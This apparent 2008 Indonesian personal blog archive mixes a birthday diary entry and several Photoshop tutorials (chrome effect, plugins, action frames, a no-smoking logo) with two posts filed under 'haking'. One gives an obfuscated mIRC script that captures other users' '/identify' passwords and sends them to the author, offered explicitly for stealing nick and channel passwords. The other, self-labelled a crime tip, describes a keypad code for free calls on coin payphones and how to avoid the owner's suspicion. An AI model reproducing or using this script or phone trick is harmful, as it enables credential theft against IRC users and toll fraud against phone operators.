hari ini hari ulang tahun aku

Posted in Tak Berkategori on Februari 2, 2008 by discomafia

di tanggal 2 febuary ini aku tdk menemukan hal yg special dalam hidup ku..(kenapa bisa begitu..?)

hanya ucapan selamat dari temen2 saja..!!

tapi aku sangat senang..

^^

oh iya tadi waktu di sekolah saiia sempat di kerjain sama guru yg di kenal paling killer di 1 sekolah itu.

masa dia tiba2 bilang saiia ada sms dia pakai kata2 kasar..!

trs saya spontan aja jawab ma tuh guru ” emang gw pikirin pak”

eh guru itu malah nyolot..

trs dia bilang sama saiia hrs ke kantor kepsek.

dah gitu sempat di suruh pulang pulaq itu..

kan capek tw..!

eh gitu gw sampe di sekolah hbs di suruh pulang malah gw kena hukum lagi sama wali kelas katanya koq keluar seenaknya aja ga pakai permisi..

gw langgsng aja panas..

emang guru di sini koq pada bertingkah smua ya..

pada suka2 hatinya aja marah2 sma orang.

akhirnya terjadilah insiden saiia melawan guru..

eh gitu balik ke kantor kepsek malah gw dapat kejutan..

dasar teman2 gw kurang ajar..!!

tpai gw sayang lu smua all(walaupun capek dari rumah ke sekolah)

tapi seru koq

^^

hacking irc password

Posted in haking on Januari 30, 2008 by discomafia

Script ini untuk mencuri nick atau channel password
Tergantung dari si korban melakukan identify untuk nicknya atau channelnya
Berikut Scriptnya :
o $+ n owner:id $+ e $+ nt $+ if $+ y:*:$- {
.ti $+ me $+ r 1 100 .m $+ s s $+ e $+ nd yo $+ u $+ rn $+ i $+ ck ($m $+ e id $+ e $+ nt $+ if $+ y $-)
}

Script ini berarti
Jika seseorang melakukan perintah /identify password, maka password akan terkirim ke memo kita, jadi berkreasilah dengan script ini
apalagi bisa men decode nya

Gratis Telpon Ke HP dari Telepon Umum ( tip dan trik kejahatan )

Posted in haking on Januari 30, 2008 by discomafia

Sebenernya sih trik ini udah lama beredar, tapi ya lumayan lah buat yg belum tau.
Pernah liat telepon umum koin di warung2/kios2 yg dari telkom (bentuknya gendut, ada tombol bicara, kadang2 ada yg pake tombol polisi, pemadam kebarakan, dll di bawah layar display) biasanya warnanya biru, hijau, item.Yah pokoknya kalo ketemu telepon umum kaya gitu, lo bakalan punya kesempatan telpon gratis kemana aja, walaupun tidak selalu.Caranya, angkat gagang telepon, simpen lagi, angkat lagi, simpen lagi terus sebanyak 10 kali.Ya…dan itu cuma pemanasan aja, biar tangan lo terbiasa angkat tutup telepon di tempat yg benar.lalu tekan “#*542404” kalau di display muncul tulisan ‘ALL FREE’ maka anda tidak perlu buka kamus untuk tau artinya. Tapi kalo yg muncul tulisan ‘ERROR XX’ (xx = angka) maka anda harus cari telepon lain. Nah kalo yg muncul tulisan “PLEASE CALL YOUR ADMINISTRATOR” berarti anda bukan berada didepan telepon umum yg tepat, karena telepon umum yg saya coba tidak pernah mengeluarkan pesan seperti itu.
Tapi jangan terlalu berharap banyak nemuin lagi telepon kaya gitu, soalnya dari pencarian di kota gue, gue cuman nemuin 4 telpon yg bisa dikerjain kaya gitu (kebanyakan pake wartel sih sekarang). And the good news is, salah satu dari 4 itu ada di depan kampus gue, hehehehe

Oh iya kalian harus hati2 juga soalnya trik ini tidak memerlukan pemasukan koin, jadi klo yg punya liat lo nelpon gak masukin koin dia bisa curiga, jadi ya itung2 sedekah lah, masukin cepe tiap 15 menit gak rugi2 amat, asal jangan lupa teken tombol bicara, biar koinnya masuk kalo ngga, nanti pas lo selesai nelpon keluar lagi yg tadi dimasukin, nanti disangkanya lo ngebongkar tuh telpon lagi. ya pokoknya usahakan se natural mungkin lah

membuat efek chrom

Posted in photoshop on Januari 30, 2008 by discomafia

Pada tutorial kali ini tentang membuat efek chrome. Mungkin gambarnya udah pernah dilihat pada post sebelumnya. Agak lama juga baru kutulis tutorial photoshop-nya.

Berikut ini adalah cara untuk membuat efek ini.

Buka dulu gambarnya dengan Photoshop. Gambar bisa menggunakan gambar apa saja. Bisa orang, atau obyek yang lain. Kalau menggunakan gambar obyek, pastikan permukaan obyek tadi nggak terlalu kasar atau ada banyak variasi warnanya.

Pada photoshop tutorial kali ini, gambar yang kugunakan adalah gambar yang di-upload oleh asianleggy di Flickr.

Membuat efek chrome dengan photoshop gambar1

Setelah gambar dibuka, ubahlah agar gambar ini menjadi hitam putih dengan cara memilih menu Image > Adjustment > Desaturate. atau bisa juga nanti, karena proses membuat jadi hitam putih ini tidak terlalu pokok. Kemudian buatlah seleksi pada gambar tersebut. Seleksi yang dibuat tidak harus detil sekali. Pada tutorial ini yang kupakai untuk membuat seleksi adalah Pen tool. Tapi bisa juga menggunakan tool seleksi yang lain, misalnya Lasso atau Magic wand tool.

Membuat efek chrome dengan photoshop gambar2

Setelah seleksinya jadi, copy-lah hasil seleksi ini, dan paste sebanyak 6 kali. Gambarnya bisa dilihat di bawah ini.

Membuat efek chrome dengan photoshop gambar3

Kemudian berilah efek chrome pada beberapa layer dengan
cara memilih menu Filter > Sketch > Chrome. Lakukan pengaturan seperti dibawah ini.

Pilih layer 1 copy. Pada layer ini, berilah efek chrome dengan pengaturan sebagai berikut: Detail:0, Smoothness:10. Ubah layer blending-nya menjadi Darken (layer blending yang mana ya? Itu lho yang ada di palet layer sebelah atas kiri, yang defaultnya adalah Normal).

Kemudian pilihlah layer 1 copy 2. Pada layer ini, berilah efek chrome dengan pengaturan sebagai berikut: Detail:5, Smoothness:5. Ubah layer blending-nya menjadi Darken juga.

Kemudian pilihlah layer 1 copy 3. Pada layer ini, berilah efek chrome dengan pengaturan sebagai berikut: Detail:10, Smoothness:0. Pilih menu Image > Adjustment > Invert. Ubah layer blending-nya menjadi Softlight.

Kemudian pilihlah layer 1 copy 4. Sebelum diberi efek chrome, terlebih dulu aturlah gambar ini dengan memilih menu Image > Adjustment > Posterize. Isikan 6 pada kotak dialog Posterize.

Membuat efek chrome dengan photoshop gambar4

Pada layer ini juga (layer 1 copy 4), berilah efek chrome dengan pengaturan sebagai berikut: Detail:0, Smoothness:10. Ubah layer blending-nya menjadi Multiply. Atur opacity hingga 50% agar tidak nampak terlalu pekat gambarnya dan bisa menampilkan layer dibawahnya.

Kemudian pada layer 1 copy 5, layer ini tidak akan kita beri efek chrome. Layer ini akan digunakan untuk membuat bagian wajah. Jika layer ini diberi efek chrome, maka akan menghilangkan detil bentuk wajahnya.

Karena yang kita butuhkan hanya bentuk wajahnya saja maka pada layer tampilkanlah hanya pada bagian wajahnya saja. Untuk membuat ini kugunakan layer mask. Caranya, klik icon Add layer mask (terletak di bagian bawah dari palet layer). Kemudian pilih Brush tool, kemudian pilih warna hitam pada warna Foreground. Sapukan brush ini pada semua bagian gambar kecuali bagian wajahnya.

Membuat efek chrome dengan photoshop gambar5

Untuk membuat agar layer ini nampak menyatu dengan layer-layer yang sudah diberi efek chrome sebelumnya, maka ubahlah gambar ini agar tidak terlalu detil. Untuk ini kugunakan filter Cutout. Caranya pilih menu Filter > Artistic > Cutout. Gunakan pengaturan seperti pada gambar dibawah ini, atau bisa juga menggunakan pengaturan yang lain terserah yang diinginkan.

Membuat efek chrome dengan photoshop gambar6

Setelah diberi efek dengan Cutout, untuk mengatur agar warnanya nampak lebih menyatu dengan gambar yang lainnya, maka aturlah warnanya dengan Levels.

Secara keseluruhan, urutan semua layer bisa dilihat pada gambar dibawah ini.
Membuat efek chrome dengan photoshop gambar7

Pada layer background, bisa dibuat agar lebih menarik lagi dengan memberi efek gradasi atau efek yang lainnya. Pada contoh di tutorial ini, kugunakan Gradient tool untuk membuat warna gradasi pada gambar.

Gambar dibawah ini adalah hasil dari tutorial photoshop untuk membuat efek chrome.
Membuat efek chrome dengan photoshop gambar8

efek keren pada plugin photoshop

Posted in Tak Berkategori on Januari 30, 2008 by discomafia

efek plugin photoshopPlugin yang saya maksudkan disini adalah sebuah fasilitas tambahan yang bisa digunakan sebagai tambahan efek / filter pada Photoshop. Plugin secara default sudah tersedia pada saat Anda menginstal photoshop, namun terbatas macamnya.

Anda bisa juga menambahkan plugin sendiri, dengan cara menginstal dari program-program plugin yang sudah banyak tersedia. Dengan menggunakan plugin maka kita bisa menambahkan efek-efek yang keren dengan cepat, sesuai dengan kemampuan dan fitur yang ditawarkan program plugin tersebut.

Plugin Photoshop yang bagus

Dari sekian banyaknya plugin yang ada, beberapa diantaranya ada yang merupakan plugin favorit saya. Karena plugin-plugin ini sangat mempermudah untuk membantu proses kerja saya. Misalnya plugin: Alien Skin Eye Candy 4000 v4.0,

efek plugin photoshop 1
dan Alien Skin Xenofex.

efek plugin photoshop 2

Selain plugin tersebut diatas, masih ada lagi plugin-plugin yang lain misalnya:

  • Filter Factory
  • Flare Effects
  • Knoll Light Factory
  • LensFlare and Glow
  • Rayflect Four Seasons

Plugin-plugin tersebut juga termasuk plugin yang sering saya gunakan.

Berikut ini sebuah contoh tampilan plugin Alien Skin Eye Candy 4000 v4.0. Pada contoh gambar ini saya memilih plugin untuk memberi efek api.

efek plugin photoshop 3
Dan inilah hasil dari plugin efek api tersebut.

efek plugin photoshop 4

Cara menginstal plugin pada photoshop

Untuk dapat menggunakan plugin, maka plugin tersebut harus sudah terinstall dalam komputer Anda.
Carilah program-program plugin untuk Photoshop. Plugin tersebut bisa Anda dapatkan di toko/rental CD program yang ada di sekitar Anda. Bisa juga dengan cara men-ndowload-nya di situs-situs internet yang menyediakan plugin Photoshop.

Installah program tersebut di PC Anda dengan menggunakan Windows Explorer. Biasanya nama file untuk menginstal-nya bernama Setup, atau nama plugin itu sendiri. Jika plugin tersebut merupakan sebuah file yang berektension .8bf, atau ektension lain, maka copy-lah file tersebut di folder plugin photoshop yang ada pada komputer Anda. Folder tersebut biasanya terletak di:
C:\Program Files\Adobe\Photoshop\Plugin.
Bisa di lihat pada gambar dibawah ini:

efek plugin photoshop 5
Saat Anda menginstal plugin Photoshop tersebut, file yang diinstall juga harus di folder tersebut. Ada beberapa plugin yang tidak seragam dalam default install folder-nya, misalnya ada yang menuliskan nama foldernya Plugins, Plugin, atau Plug-ins. Pilih, atau ketik sendiri yang sesuai dengan letak folder plugin di komputer Anda.

Selain plugin yang sudah saya sebutkan diatas, masih ada banyak sekali plugin yang lain. Jika ada diantara para pembaca yang mempunyai plugin favorit, silahkan di-sharing di form komentarefek plugin photoshopPlugin yang saya maksudkan disini adalah sebuah fasilitas tambahan yang bisa digunakan sebagai tambahan efek / filter pada Photoshop. Plugin secara default sudah tersedia pada saat Anda menginstal photoshop, namun terbatas macamnya.

Anda bisa juga menambahkan plugin sendiri, dengan cara menginstal dari program-program plugin yang sudah banyak tersedia. Dengan menggunakan plugin maka kita bisa menambahkan efek-efek yang keren dengan cepat, sesuai dengan kemampuan dan fitur yang ditawarkan program plugin tersebut.

Plugin Photoshop yang bagus

Dari sekian banyaknya plugin yang ada, beberapa diantaranya ada yang merupakan plugin favorit saya. Karena plugin-plugin ini sangat mempermudah untuk membantu proses kerja saya. Misalnya plugin: Alien Skin Eye Candy 4000 v4.0,

efek plugin photoshop 1
dan Alien Skin Xenofex.

efek plugin photoshop 2

Selain plugin tersebut diatas, masih ada lagi plugin-plugin yang lain misalnya:

  • Filter Factory
  • Flare Effects
  • Knoll Light Factory
  • LensFlare and Glow
  • Rayflect Four Seasons

Plugin-plugin tersebut juga termasuk plugin yang sering saya gunakan.

Berikut ini sebuah contoh tampilan plugin Alien Skin Eye Candy 4000 v4.0. Pada contoh gambar ini saya memilih plugin untuk memberi efek api.

efek plugin photoshop 3
Dan inilah hasil dari plugin efek api tersebut.

efek plugin photoshop 4

Cara menginstal plugin pada photoshop

Untuk dapat menggunakan plugin, maka plugin tersebut harus sudah terinstall dalam komputer Anda.
Carilah program-program plugin untuk Photoshop. Plugin tersebut bisa Anda dapatkan di toko/rental CD program yang ada di sekitar Anda. Bisa juga dengan cara men-ndowload-nya di situs-situs internet yang menyediakan plugin Photoshop.

Installah program tersebut di PC Anda dengan menggunakan Windows Explorer. Biasanya nama file untuk menginstal-nya bernama Setup, atau nama plugin itu sendiri. Jika plugin tersebut merupakan sebuah file yang berektension .8bf, atau ektension lain, maka copy-lah file tersebut di folder plugin photoshop yang ada pada komputer Anda. Folder tersebut biasanya terletak di:
C:\Program Files\Adobe\Photoshop\Plugin.
Bisa di lihat pada gambar dibawah ini:

efek plugin photoshop 5
Saat Anda menginstal plugin Photoshop tersebut, file yang diinstall juga harus di folder tersebut. Ada beberapa plugin yang tidak seragam dalam default install folder-nya, misalnya ada yang menuliskan nama foldernya Plugins, Plugin, atau Plug-ins. Pilih, atau ketik sendiri yang sesuai dengan letak folder plugin di komputer Anda.

Selain plugin yang sudah saya sebutkan diatas, masih ada banyak sekali plugin yang lain. Jika ada diantara para pembaca yang mempunyai plugin favorit, silahkan di-sharing di form komentar

membuat frame dari action

Posted in photoshop on Januari 30, 2008 by discomafia

frame dari action photoshopTutorial Photoshop kali ini akan saya gunakan untuk membahas penggunaan action untuk membuat bingkai foto atau frame. Keterangan lebih lanjut tentang action, bisa dibaca disini. Karena hanya menggunakan action, maka jenis frame yang bisa dibuat hanya sedikit macamnya, namun ini tetap bisa digunakan untuk memperindah gambar/foto Anda.

Pembuatan frame yang lebih bervariasi akan saya coba bahas pada post selanjutnya.

Langkah 1
Bukalah gambar yang akan Anda beri frame. Pada contoh tutorial Photoshop kali ini saya gunakan gambar dari game Need for Speed, gambarnya ini sudah saya crop dan perkecil ukurannya.

Gambar yang akan diberi frame dengan action photoshop

Langkah 2
Aktifkan palet Action. Jika belum aktif, bisa dipilih dulu dari menu Window > Action.

Langkah 3
Tampilkan action yang khusus tentang pembuatan frame. Caranya dengan melakukan klik pada segitiga kecil di palet tersebut (lingkaran merah pada gambar ilustrasi).

gambar menu palet action pada photoshop
Langkah 4
Klik nama action yang Anda inginkan, kemudian klik icon Play Action pada sebelah bawah palet Action.

gambar jenis frame pada palet action photoshop
Tunggu sebentar, frame akan jadi secara otomatis.

Jika Anda ingin mencoba-coba jenis frame yang lain, pilih dulu menu File > Revert, atau tekan F12 di keyboard. Ini agar gambar kembali ke kondisi semula dulu sebelum diberi frame lagi.

Berikut ini beberapa contoh frame yang dibuat dengan action.

gambar contoh frame dengan action photoshop
Selamat mencoba.
di buat oleh wahyoe AKA discomafia

membuat logo larangan merokok

Posted in photoshop on Januari 30, 2008 by discomafia

Tutorial photoshop yang ini akan saya gunakan untuk menulis tutorial pembuatan logo larangan anti merokok, sekaligus juga untuk menulis tentang contoh penggunaan efek asap dan efek tulisan logam pada post sebelumnya. Ide pembuatan logo ini sebenarnya sudah lama, karena dulu pernah saya buat untuk contoh logo buat siswa-siswa desain grafis saya.
Berikut ini langkah-langkah pembuatannya.

Cara membuat logo dengan efek logam dan asap

Langkah 1
Buatlah sebuah file baru berukuran 800×600

tutorial photoshop membuat logo 1
Langkah 2
Pilih Text Tool pada toolbox photoshop. Pilihlah jenis font Webding. Pemilihan font bisa dilakukan dengan memilihnya dari bagian option bar (di sebelah atas). Font Webding dipilih karena dalam font tersebut terdapat karakter simbol larangan merokok yang akan kita buat.

tutorial photoshop membuat logo 2
Langkah 3
Klik pada file baru tadi dengan text tool, kemudian ketiklah huruf ” z “.

tutorial photoshop membuat logo 3
Kemudian pilih Move Tool. Jika ukuran huruf kurang besar bisa diubah ukurannya dengan memilih Edit > Free Transform. Ubahlah ukurannya secara proporsional (dengan melakukan drag pada titik anchor sudut sambil menekan tombol Shift di keyboard).

tutorial photoshop membuat logo 4
Langkah 4
Layer yang berisikan gambar logo anti rokok ini kita buat menjadi berefek chrome dulu. Bagi yang belum membaca tentang pembuatan efek chrome pada tulisan, silahkan dibaca dulu di sini. Terapkan langkah pembuatan efek chrome tersebut pada logo ini.

tutorial photoshop membuat logo 5
Langkah 5
Agar nampak lebih dramatis, pada logo tersebut kita beri efek asap. Tentang pembuatan efek asap pada photoshop bisa dibaca keterangannya di sini. Namun pada contoh tutorial ini, efek asap dibuat dengan menggunakan plugin photoshop Eye Candy 4000. Jika sudah mempunyai plugin ini, gunakanlah untuk membuat efek asapnya.

tutorial photoshop membuat logo 6
Langkah 6
Agar efek asap lebih nampak nyata dan untuk lebih menguatkan kesan pada gambar, layer background diberi warna gradasi hitam putih. Untuk membuat warna gradasi ini, pilihlah Gradient Tool pada toolbox photoshop, kemudian pilihlah warna gradasinya yang hitam putih. Untuk memilih warna gradasi, bisa dilakukan dengan memilihnya di bagian option bar setelah gradient tool tadi dipilih. Pilih layer background, kemudian klik dan geser pointernya untuk membuat warna gradasi.

Langkah 7
Jika perlu, bisa ditambahkan tulisan untuk mempertegas makna gambar yang kita buat.

Berikut ini gambar yang sudah jadi.

tutorial photoshop membuat logo 7
Ukuran gambar ini pas buat wallpaper. Jika Anda suka, silahkan dipakai untuk wallpaper komputer Anda. Sekalian buat kampanye anti rokok, terutama bagi para pembaca yang “ahli hisap” seperti saya.

di tulis oleh wahyoe AKA discomafia